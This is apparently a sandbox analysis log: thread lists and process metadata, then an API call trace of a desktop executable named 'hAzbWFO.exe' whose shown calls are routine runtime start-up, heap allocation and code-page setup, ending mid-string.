os_tid = 0xdb9c Thread: id = 13369 os_tid = 0xdba0 Thread: id = 13370 os_tid = 0xdba4 Thread: id = 13371 os_tid = 0xdba8 Thread: id = 13372 os_tid = 0xdbac Thread: id = 13373 os_tid = 0xdbb0 Thread: id = 13374 os_tid = 0xdbb4 Thread: id = 13375 os_tid = 0xdbb8 Thread: id = 13376 os_tid = 0xdbbc Thread: id = 13377 os_tid = 0xdbc0 Thread: id = 13378 os_tid = 0xdbc4 Thread: id = 13379 os_tid = 0xdbc8 Thread: id = 13380 os_tid = 0xdbcc Thread: id = 13381 os_tid = 0xdbd0 Thread: id = 13382 os_tid = 0xdbd4 Thread: id = 13383 os_tid = 0xdbd8 Thread: id = 13384 os_tid = 0xdbdc Thread: id = 13385 os_tid = 0xdbe0 Thread: id = 13386 os_tid = 0xdbe4 Thread: id = 13387 os_tid = 0xdbe8 Thread: id = 13388 os_tid = 0xdbec Thread: id = 13389 os_tid = 0xdbf0 Thread: id = 13390 os_tid = 0xdbf4 Thread: id = 13391 os_tid = 0xdbf8 Thread: id = 13392 os_tid = 0xdbfc Thread: id = 13393 os_tid = 0xa6c4 Thread: id = 13395 os_tid = 0x110c Thread: id = 13396 os_tid = 0xdfc Thread: id = 13397 os_tid = 0xd4c Thread: id = 13398 os_tid = 0x1018 Thread: id = 13399 os_tid = 0xebc Thread: id = 13400 os_tid = 0x2fe4 Thread: id = 13401 os_tid = 0xda18 Thread: id = 13402 os_tid = 0xdc04 Thread: id = 13403 os_tid = 0xdc08 Thread: id = 13404 os_tid = 0xdc0c Thread: id = 13405 os_tid = 0xdc10 Thread: id = 13406 os_tid = 0xdc14 Thread: id = 13407 os_tid = 0xdc18 Thread: id = 13408 os_tid = 0xdc1c Thread: id = 13409 os_tid = 0xdc20 Thread: id = 13410 os_tid = 0xdc24 Thread: id = 13411 os_tid = 0xdc28 Thread: id = 13412 os_tid = 0xdc2c Thread: id = 13413 os_tid = 0xdc30 Thread: id = 13414 os_tid = 0xdc34 Thread: id = 13415 os_tid = 0xdc38 Thread: id = 13416 os_tid = 0xdc3c Thread: id = 13417 os_tid = 0xdc40 Thread: id = 13418 os_tid = 0xdc44 Thread: id = 13419 os_tid = 0xdc48 Thread: id = 13420 os_tid = 0xdc4c Thread: id = 13421 os_tid = 0xdc50 Thread: id = 13422 os_tid = 0xdc54 Thread: id = 13423 os_tid = 0xdc58 Thread: id = 13424 os_tid = 0xdc5c Thread: id = 13425 os_tid = 0xdc60 Thread: id = 13426 os_tid = 0xdc64 Thread: id = 13427 os_tid = 0xdc68 Thread: id = 13428 os_tid = 0xdc6c Thread: id = 13429 os_tid = 0xdc70 Thread: id = 13430 os_tid = 0xdc74 Thread: id = 13431 os_tid = 0xdc78 Thread: id = 13432 os_tid = 0xdc7c Thread: id = 13433 os_tid = 0xdc80 Thread: id = 13434 os_tid = 0xdc84 Thread: id = 13435 os_tid = 0xdc88 Thread: id = 13436 os_tid = 0xdc8c Thread: id = 13437 os_tid = 0xdc90 Thread: id = 13438 os_tid = 0xdc94 Thread: id = 13439 os_tid = 0xdc98 Thread: id = 13440 os_tid = 0xdc9c Thread: id = 13441 os_tid = 0xdca0 Thread: id = 13442 os_tid = 0xdca4 Thread: id = 13443 os_tid = 0xdca8 Thread: id = 13444 os_tid = 0xdcac Thread: id = 13445 os_tid = 0xdcb0 Thread: id = 13446 os_tid = 0xdcb4 Thread: id = 13447 os_tid = 0xdcb8 Thread: id = 13448 os_tid = 0xdcbc Thread: id = 13449 os_tid = 0xdcc0 Thread: id = 13450 os_tid = 0xdcc4 Thread: id = 13451 os_tid = 0xdcc8 Thread: id = 13452 os_tid = 0xdccc Thread: id = 13453 os_tid = 0xdcd0 Thread: id = 13454 os_tid = 0xdcd4 Thread: id = 13458 os_tid = 0xdce4 Thread: id = 13459 os_tid = 0xdce8 Thread: id = 13460 os_tid = 0xdcec Thread: id = 13461 os_tid = 0xdcf0 Thread: id = 13462 os_tid = 0xdcf4 Thread: id = 13463 os_tid = 0xdcf8 Thread: id = 13464 os_tid = 0xdcfc Thread: id = 13465 os_tid = 0xdd00 Thread: id = 13466 os_tid = 0xdd04 Thread: id = 13467 os_tid = 0xdd08 Thread: id = 13468 os_tid = 0xdd0c Thread: id = 13469 os_tid = 0xdd10 Thread: id = 13470 os_tid = 0xdd14 Thread: id = 13471 os_tid = 0xdd18 Thread: id = 13472 os_tid = 0xdd1c Thread: id = 13473 os_tid = 0xdd20 Thread: id = 13474 os_tid = 0xdd24 Thread: id = 13475 os_tid = 0xdd28 Thread: id = 13476 os_tid = 0xdd2c Thread: id = 13477 os_tid = 0xdd30 Thread: id = 13478 os_tid = 0xdd34 Thread: id = 13479 os_tid = 0xdd38 Thread: id = 13480 os_tid = 0xdd3c Thread: id = 13481 os_tid = 0xdd40 Thread: id = 13482 os_tid = 0xdd44 Thread: id = 13483 os_tid = 0xdd48 Thread: id = 13484 os_tid = 0xdd4c Thread: id = 13485 os_tid = 0xdd50 Thread: id = 13486 os_tid = 0xdd54 Thread: id = 13487 os_tid = 0xdd58 Thread: id = 13488 os_tid = 0xdd5c Thread: id = 13489 os_tid = 0xdd60 Thread: id = 13490 os_tid = 0xdd64 Thread: id = 13491 os_tid = 0xdd68 Thread: id = 13492 os_tid = 0xdd6c Thread: id = 13493 os_tid = 0xdd70 Thread: id = 13495 os_tid = 0xdd78 Thread: id = 13496 os_tid = 0xdd7c Thread: id = 13497 os_tid = 0xdd80 Thread: id = 13498 os_tid = 0xdd84 Thread: id = 13499 os_tid = 0xdd88 Thread: id = 13500 os_tid = 0xdd8c Thread: id = 13501 os_tid = 0xdd90 Thread: id = 13502 os_tid = 0xdd94 Thread: id = 13503 os_tid = 0xdd98 Thread: id = 13504 os_tid = 0xdd9c Thread: id = 13505 os_tid = 0xdda0 Thread: id = 13506 os_tid = 0xdda4 Thread: id = 13507 os_tid = 0xdda8 Thread: id = 13508 os_tid = 0xddac Thread: id = 13509 os_tid = 0xddb0 Thread: id = 13510 os_tid = 0xddb4 Thread: id = 13511 os_tid = 0xddb8 Thread: id = 13512 os_tid = 0xddbc Thread: id = 13513 os_tid = 0xddc0 Thread: id = 13514 os_tid = 0xddc4 Thread: id = 13515 os_tid = 0xddc8 Thread: id = 13516 os_tid = 0xddcc Thread: id = 13517 os_tid = 0xddd0 Thread: id = 13518 os_tid = 0xddd4 Thread: id = 13519 os_tid = 0xddd8 Thread: id = 13520 os_tid = 0xdddc Thread: id = 13521 os_tid = 0xdde0 Thread: id = 13522 os_tid = 0xdde4 Thread: id = 13523 os_tid = 0xdde8 Thread: id = 13524 os_tid = 0xddec Thread: id = 13525 os_tid = 0xddf0 Thread: id = 13526 os_tid = 0xddf4 Thread: id = 13527 os_tid = 0xddf8 Thread: id = 13528 os_tid = 0xddfc Thread: id = 13529 os_tid = 0xde00 Thread: id = 13530 os_tid = 0xde04 Thread: id = 13531 os_tid = 0xde08 Thread: id = 13532 os_tid = 0xde0c Thread: id = 13533 os_tid = 0xde10 Thread: id = 13534 os_tid = 0xde14 Thread: id = 13535 os_tid = 0xde18 Thread: id = 13536 os_tid = 0xde1c Thread: id = 13538 os_tid = 0xde24 Thread: id = 13539 os_tid = 0xde28 Thread: id = 13540 os_tid = 0xde2c Thread: id = 13541 os_tid = 0xde30 Thread: id = 13542 os_tid = 0xde34 Thread: id = 13543 os_tid = 0xde38 Thread: id = 13544 os_tid = 0xde3c Thread: id = 13545 os_tid = 0xde40 Thread: id = 13546 os_tid = 0xde44 Thread: id = 13547 os_tid = 0xde48 Thread: id = 13548 os_tid = 0xde4c Thread: id = 13549 os_tid = 0xde50 Thread: id = 13550 os_tid = 0xde54 Thread: id = 13551 os_tid = 0xde58 Thread: id = 13552 os_tid = 0xde5c Thread: id = 13553 os_tid = 0xde60 Thread: id = 13554 os_tid = 0xde64 Thread: id = 13555 os_tid = 0xde68 Thread: id = 13556 os_tid = 0xde6c Thread: id = 13557 os_tid = 0xde70 Thread: id = 13558 os_tid = 0xde74 Thread: id = 13559 os_tid = 0xde78 Thread: id = 13560 os_tid = 0xde7c Thread: id = 13561 os_tid = 0xde80 Thread: id = 13562 os_tid = 0xde84 Thread: id = 13564 os_tid = 0xde90 Thread: id = 13565 os_tid = 0xde94 Thread: id = 13566 os_tid = 0xde98 Thread: id = 13567 os_tid = 0xde9c Thread: id = 13568 os_tid = 0xdea0 Thread: id = 13569 os_tid = 0xdea4 Thread: id = 13571 os_tid = 0xdeac Thread: id = 13572 os_tid = 0xdeb0 Thread: id = 13573 os_tid = 0xdeb4 Thread: id = 13574 os_tid = 0xdeb8 Thread: id = 13575 os_tid = 0xdebc Thread: id = 13576 os_tid = 0xdec0 Thread: id = 13577 os_tid = 0xdec4 Thread: id = 13578 os_tid = 0xdec8 Thread: id = 13579 os_tid = 0xdecc Thread: id = 13580 os_tid = 0xded0 Thread: id = 13581 os_tid = 0xded4 Thread: id = 13582 os_tid = 0xded8 Thread: id = 13583 os_tid = 0xdedc Thread: id = 13584 os_tid = 0xdee0 Thread: id = 13586 os_tid = 0xdee8 Thread: id = 13587 os_tid = 0xdeec Thread: id = 13588 os_tid = 0xdef0 Thread: id = 13589 os_tid = 0xdef4 Thread: id = 13590 os_tid = 0xdef8 Thread: id = 13591 os_tid = 0xdefc Thread: id = 13592 os_tid = 0xdf00 Thread: id = 13593 os_tid = 0xdf04 Thread: id = 13594 os_tid = 0xdf08 Thread: id = 13595 os_tid = 0xdf0c Thread: id = 13596 os_tid = 0xdf10 Thread: id = 13597 os_tid = 0xdf14 Thread: id = 13598 os_tid = 0xdf18 Thread: id = 13599 os_tid = 0xdf1c Thread: id = 13600 os_tid = 0xdf20 Thread: id = 13601 os_tid = 0xdf24 Thread: id = 13602 os_tid = 0xdf28 Thread: id = 13603 os_tid = 0xdf2c Thread: id = 13604 os_tid = 0xdf30 Thread: id = 13605 os_tid = 0xdf34 Thread: id = 13606 os_tid = 0xdf38 Thread: id = 13607 os_tid = 0xdf3c Thread: id = 13608 os_tid = 0xdf40 Thread: id = 13609 os_tid = 0xdf44 Thread: id = 13610 os_tid = 0xdf48 Thread: id = 13611 os_tid = 0xdf4c Thread: id = 13612 os_tid = 0xdf50 Thread: id = 13613 os_tid = 0xdf54 Thread: id = 13614 os_tid = 0xdf58 Thread: id = 13615 os_tid = 0xdf5c Thread: id = 13616 os_tid = 0xdf60 Thread: id = 13617 os_tid = 0xdf64 Thread: id = 13618 os_tid = 0xdf68 Thread: id = 13619 os_tid = 0xdf6c Thread: id = 13620 os_tid = 0xdf70 Thread: id = 13621 os_tid = 0xdf74 Thread: id = 13622 os_tid = 0xdf78 Thread: id = 13623 os_tid = 0xdf7c Thread: id = 13624 os_tid = 0xdf80 Thread: id = 13625 os_tid = 0xdf84 Thread: id = 13626 os_tid = 0xdf88 Thread: id = 13627 os_tid = 0xdf8c Thread: id = 13628 os_tid = 0xdf90 Thread: id = 13629 os_tid = 0xdf94 Thread: id = 13630 os_tid = 0xdf98 Thread: id = 13631 os_tid = 0xdf9c Thread: id = 13632 os_tid = 0xdfa0 Thread: id = 13633 os_tid = 0xdfa4 Thread: id = 13634 os_tid = 0xdfa8 Thread: id = 13635 os_tid = 0xdfac Thread: id = 13636 os_tid = 0xdfb8 Thread: id = 13637 os_tid = 0xdfbc Thread: id = 13638 os_tid = 0xdfc0 Thread: id = 13639 os_tid = 0xdfc4 Thread: id = 13640 os_tid = 0xdfc8 Thread: id = 13641 os_tid = 0xdfcc Thread: id = 13642 os_tid = 0xdfd0 Thread: id = 13643 os_tid = 0xdfd4 Thread: id = 13644 os_tid = 0xdfd8 Thread: id = 13645 os_tid = 0xdfdc Thread: id = 13646 os_tid = 0xdfe0 Thread: id = 13647 os_tid = 0xdfe4 Thread: id = 13648 os_tid = 0xdfe8 Thread: id = 13649 os_tid = 0xdfec Thread: id = 13650 os_tid = 0xdff0 Thread: id = 13651 os_tid = 0xdff4 Thread: id = 13652 os_tid = 0xdff8 Thread: id = 13653 os_tid = 0xdffc Thread: id = 13654 os_tid = 0xdb60 Thread: id = 13655 os_tid = 0x1834 Thread: id = 13656 os_tid = 0xd968 Thread: id = 13657 os_tid = 0x4098 Thread: id = 13658 os_tid = 0xd62c Thread: id = 13659 os_tid = 0xd69c Thread: id = 13660 os_tid = 0xd780 Thread: id = 13661 os_tid = 0xd718 Thread: id = 13662 os_tid = 0xd628 Thread: id = 13663 os_tid = 0xd71c Thread: id = 13664 os_tid = 0xd660 Thread: id = 13665 os_tid = 0xd648 Thread: id = 13666 os_tid = 0xa200 Thread: id = 13667 os_tid = 0xe004 Thread: id = 13668 os_tid = 0xe008 Thread: id = 13669 os_tid = 0xe00c Thread: id = 13670 os_tid = 0xe010 Thread: id = 13671 os_tid = 0xe014 Thread: id = 13672 os_tid = 0xe018 Thread: id = 13673 os_tid = 0xe01c Thread: id = 13674 os_tid = 0xe020 Thread: id = 13675 os_tid = 0xe024 Thread: id = 13676 os_tid = 0xe028 Thread: id = 13677 os_tid = 0xe02c Thread: id = 13678 os_tid = 0xe030 Thread: id = 13679 os_tid = 0xe034 Process: id = "2" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x49390000" os_pid = "0x538" os_integrity_level = "0x4000" os_privileges = "0x260814080" monitor_reason = "rpc_server" parent_id = "1" os_parent_pid = "0x24c" cmd_line = "C:\\WINDOWS\\system32\\svchost.exe -k appmodel" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EntAppSvc" [0xa], "NT SERVICE\\StateRepository" [0xe], "NT SERVICE\\tiledatamodelsvc" [0xa], "NT SERVICE\\WalletService" [0xa], "NT AUTHORITY\\Logon Session 00000000:00011899" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 11 os_tid = 0x908 Thread: id = 12 os_tid = 0x900 Thread: id = 13 os_tid = 0x8f8 Thread: id = 14 os_tid = 0x8f0 Thread: id = 15 os_tid = 0x570 Thread: id = 16 os_tid = 0x5a8 Thread: id = 17 os_tid = 0x614 Thread: id = 18 os_tid = 0x610 Thread: id = 19 os_tid = 0x604 Thread: id = 20 os_tid = 0x598 Thread: id = 21 os_tid = 0x594 Thread: id = 22 os_tid = 0x590 Thread: id = 23 os_tid = 0x53c Process: id = "3" image_name = "hazbwfo.exe" filename = "c:\\users\\fd1hvy\\desktop\\hazbwfo.exe" page_root = "0xbc81000" os_pid = "0x130c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xea0" cmd_line = "\"C:\\Users\\FD1HVy\\Desktop\\hAzbWFO.exe\" 8 LAN" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 24 os_tid = 0x1338 [0127.490] GetStartupInfoW (in: lpStartupInfo=0x19ff18 | out: lpStartupInfo=0x19ff18*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\FD1HVy\\Desktop\\hAzbWFO.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0127.490] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x2090000 [0127.491] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74030000 [0127.491] GetProcAddress (hModule=0x74030000, lpProcName="FlsAlloc") returned 0x74044ae0 [0127.491] GetProcAddress (hModule=0x74030000, lpProcName="FlsGetValue") returned 0x74044b20 [0127.491] GetProcAddress (hModule=0x74030000, lpProcName="FlsSetValue") returned 0x74044b40 [0127.491] GetProcAddress (hModule=0x74030000, lpProcName="FlsFree") returned 0x74044b00 [0127.492] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74030000 [0127.492] GetProcAddress (hModule=0x74030000, lpProcName="EncodePointer") returned 0x773f29e0 [0127.492] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74030000 [0127.493] GetProcAddress (hModule=0x74030000, lpProcName="EncodePointer") returned 0x773f29e0 [0127.493] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74030000 [0127.493] GetProcAddress (hModule=0x74030000, lpProcName="EncodePointer") returned 0x773f29e0 [0127.493] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74030000 [0127.493] GetProcAddress (hModule=0x74030000, lpProcName="EncodePointer") returned 0x773f29e0 [0127.493] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74030000 [0127.493] GetProcAddress (hModule=0x74030000, lpProcName="EncodePointer") returned 0x773f29e0 [0127.493] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74030000 [0127.493] GetProcAddress (hModule=0x74030000, lpProcName="EncodePointer") returned 0x773f29e0 [0127.494] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74030000 [0127.494] GetProcAddress (hModule=0x74030000, lpProcName="EncodePointer") returned 0x773f29e0 [0127.494] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74030000 [0127.494] GetProcAddress (hModule=0x74030000, lpProcName="DecodePointer") returned 0x773f1ec0 [0127.495] RtlAllocateHeap (HeapHandle=0x2090000, Flags=0x8, Size=0x214) returned 0x20905a8 [0127.495] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74030000 [0127.495] GetProcAddress (hModule=0x74030000, lpProcName="DecodePointer") returned 0x773f1ec0 [0127.495] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74030000 [0127.495] GetProcAddress (hModule=0x74030000, lpProcName="EncodePointer") returned 0x773f29e0 [0127.495] GetProcAddress (hModule=0x74030000, lpProcName="DecodePointer") returned 0x773f1ec0 [0127.495] GetCurrentThreadId () returned 0x1338 [0127.495] GetStartupInfoA (in: lpStartupInfo=0x19fe9c | out: lpStartupInfo=0x19fe9c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\FD1HVy\\Desktop\\hAzbWFO.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0127.496] RtlAllocateHeap (HeapHandle=0x2090000, Flags=0x8, Size=0x800) returned 0x20907c8 [0127.496] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0127.496] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0127.496] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0127.496] SetHandleCount (uNumber=0x20) returned 0x20 [0127.496] GetCommandLineW () returned="\"C:\\Users\\FD1HVy\\Desktop\\hAzbWFO.exe\" 8 LAN" [0127.496] GetEnvironmentStringsW () returned 0x5dea18* [0127.496] RtlAllocateHeap (HeapHandle=0x2090000, Flags=0x0, Size=0xaca) returned 0x2090fd0 [0127.496] FreeEnvironmentStringsW (penv=0x5dea18) returned 1 [0127.496] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x43ce40, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\hAzbWFO.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\hazbwfo.exe")) returned 0x23 [0127.496] RtlAllocateHeap (HeapHandle=0x2090000, Flags=0x0, Size=0x64) returned 0x2091aa8 [0127.496] RtlAllocateHeap (HeapHandle=0x2090000, Flags=0x8, Size=0x94) returned 0x2091b18 [0127.496] RtlAllocateHeap (HeapHandle=0x2090000, Flags=0x8, Size=0x3e) returned 0x2091bb8 [0127.496] RtlAllocateHeap (HeapHandle=0x2090000, Flags=0x8, Size=0x50) returned 0x2091c00 [0127.496] RtlAllocateHeap (HeapHandle=0x2090000, Flags=0x8, Size=0x6e) returned 0x2091c58 [0127.496] RtlAllocateHeap (HeapHandle=0x2090000, Flags=0x8, Size=0x78) returned 0x2091cd0 [0127.496] RtlAllocateHeap (HeapHandle=0x2090000, Flags=0x8, Size=0x62) returned 0x2091d50 [0127.496] RtlAllocateHeap (HeapHandle=0x2090000, Flags=0x8, Size=0x28) returned 0x2091dc0 [0127.496] RtlAllocateHeap (HeapHandle=0x2090000, Flags=0x8, Size=0x48) returned 0x2091df0 [0127.496] RtlAllocateHeap (HeapHandle=0x2090000, Flags=0x8, Size=0x1a) returned 0x2091e40 [0127.496] RtlAllocateHeap (HeapHandle=0x2090000, Flags=0x8, Size=0x2e) returned 0x2091e68 [0127.496] RtlAllocateHeap (HeapHandle=0x2090000, Flags=0x8, Size=0x56) returned 0x2091ea0 [0127.496] RtlAllocateHeap (HeapHandle=0x2090000, Flags=0x8, Size=0x2a) returned 0x2091f00 [0127.496] RtlAllocateHeap (HeapHandle=0x2090000, Flags=0x8, Size=0x2e) returned 0x2091f38 [0127.496] RtlAllocateHeap (HeapHandle=0x2090000, Flags=0x8, Size=0x44) returned 0x2091f70 [0127.496] RtlAllocateHeap (HeapHandle=0x2090000, Flags=0x8, Size=0x1c) returned 0x2091fc0 [0127.496] RtlAllocateHeap (HeapHandle=0x2090000, Flags=0x8, Size=0x182) returned 0x2091fe8 [0127.497] RtlAllocateHeap (HeapHandle=0x2090000, Flags=0x8, Size=0x7c) returned 0x2092178 [0127.497] RtlAllocateHeap (HeapHandle=0x2090000, Flags=0x8, Size=0x36) returned 0x2092200 [0127.497] RtlAllocateHeap (HeapHandle=0x2090000, Flags=0x8, Size=0x3a) returned 0x2092240 [0127.497] RtlAllocateHeap (HeapHandle=0x2090000, Flags=0x8, Size=0x90) returned 0x2092288 [0127.497] RtlAllocateHeap (HeapHandle=0x2090000, Flags=0x8, Size=0x24) returned 0x2092320 [0127.497] RtlAllocateHeap (HeapHandle=0x2090000, Flags=0x8, Size=0x30) returned 0x2092350 [0127.497] RtlAllocateHeap (HeapHandle=0x2090000, Flags=0x8, Size=0x36) returned 0x2092388 [0127.497] RtlAllocateHeap (HeapHandle=0x2090000, Flags=0x8, Size=0x48) returned 0x20923c8 [0127.497] RtlAllocateHeap (HeapHandle=0x2090000, Flags=0x8, Size=0x52) returned 0x2092418 [0127.497] RtlAllocateHeap (HeapHandle=0x2090000, Flags=0x8, Size=0x3c) returned 0x2092478 [0127.497] RtlAllocateHeap (HeapHandle=0x2090000, Flags=0x8, Size=0xd6) returned 0x20924c0 [0127.497] RtlAllocateHeap (HeapHandle=0x2090000, Flags=0x8, Size=0x2e) returned 0x20925a0 [0127.497] RtlAllocateHeap (HeapHandle=0x2090000, Flags=0x8, Size=0x1e) returned 0x20925d8 [0127.497] RtlAllocateHeap (HeapHandle=0x2090000, Flags=0x8, Size=0x2c) returned 0x2092600 [0127.497] RtlAllocateHeap (HeapHandle=0x2090000, Flags=0x8, Size=0x50) returned 0x2092638 [0127.497] RtlAllocateHeap (HeapHandle=0x2090000, Flags=0x8, Size=0x4e) returned 0x2092690 [0127.497] RtlAllocateHeap (HeapHandle=0x2090000, Flags=0x8, Size=0x24) returned 0x20926e8 [0127.497] RtlAllocateHeap (HeapHandle=0x2090000, Flags=0x8, Size=0x42) returned 0x2092718 [0127.497] RtlAllocateHeap (HeapHandle=0x2090000, Flags=0x8, Size=0x20) returned 0x2092768 [0127.497] RtlAllocateHeap (HeapHandle=0x2090000, Flags=0x8, Size=0x38) returned 0x2092790 [0127.497] RtlAllocateHeap (HeapHandle=0x2090000, Flags=0x8, Size=0x24) returned 0x20927d0 [0127.497] HeapFree (in: hHeap=0x2090000, dwFlags=0x0, lpMem=0x2090fd0 | out: hHeap=0x2090000) returned 1 [0127.497] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x74030000 [0127.497] GetProcAddress (hModule=0x74030000, lpProcName="IsProcessorFeaturePresent") returned 0x74045960 [0127.497] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0127.499] RtlAllocateHeap (HeapHandle=0x2090000, Flags=0x8, Size=0x80) returned 0x2092800 [0127.499] GetLastError () returned 0x0 [0127.499] SetLastError (dwErrCode=0x0) [0127.499] GetLastError () returned 0x0 [0127.499] SetLastError (dwErrCode=0x0) [0127.499] GetLastError () returned 0x0 [0127.499] SetLastError (dwErrCode=0x0) [0127.499] GetACP () returned 0x4e4 [0127.499] RtlAllocateHeap (HeapHandle=0x2090000, Flags=0x0, Size=0x220) returned 0x2092888 [0127.499] GetLastError () returned 0x0 [0127.499] SetLastError (dwErrCode=0x0) [0127.499] IsValidCodePage (CodePage=0x4e4) returned 1 [0127.499] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19fe7c | out: lpCPInfo=0x19fe7c) returned 1 [0127.499] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19f948 | out: lpCPInfo=0x19f948) returned 1 [0127.499] GetLastError () returned 0x0 [0127.499] SetLastError (dwErrCode=0x0) [0127.499] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x19f8d8 | out: lpCharType=0x19f8d8) returned 1 [0127.499] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0127.500] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x19f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿAĀ") returned 256 [0127.500] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿAĀ", cchSrc=256, lpCharType=0x19f95c | out: lpCharType=0x19f95c) returned 1 [0127.500] GetLastError () returned 0x0 [0127.500] SetLastError (dwErrCode=0x0) [0127.500] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0127.500] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0127.500] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x19f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ 